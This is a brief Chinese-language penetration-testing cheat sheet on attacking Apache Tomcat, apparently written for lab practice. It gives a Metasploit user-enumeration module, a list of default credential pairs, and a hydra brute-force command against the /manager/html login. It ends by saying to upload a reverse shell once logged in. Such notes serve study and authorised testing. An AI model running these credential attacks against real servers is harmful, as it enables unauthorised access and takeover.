Apache Tomcat 漏洞利用
通过对apache tomcat的枚举和利用,我们可以从中找出漏洞,然后得到shell
枚举
- 在 Tomcat6 之前的某些版本中,我们可以使用msf枚举用户:
msf> use auxiliary/scanner/http/tomcat_enum
-
常见的得到的用户名与密码是:
- admin:admin
- tomcat:tomcat
- admin: NOTHING
- admin:s3cr3t
- tomcat:s3cr3t
- admin:tomcat
-
当然,我们也可以使用hydra进行暴力破解
hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html
- 得到了用户名与密码后,我们就可以登录到 /manager/html下传输反向shell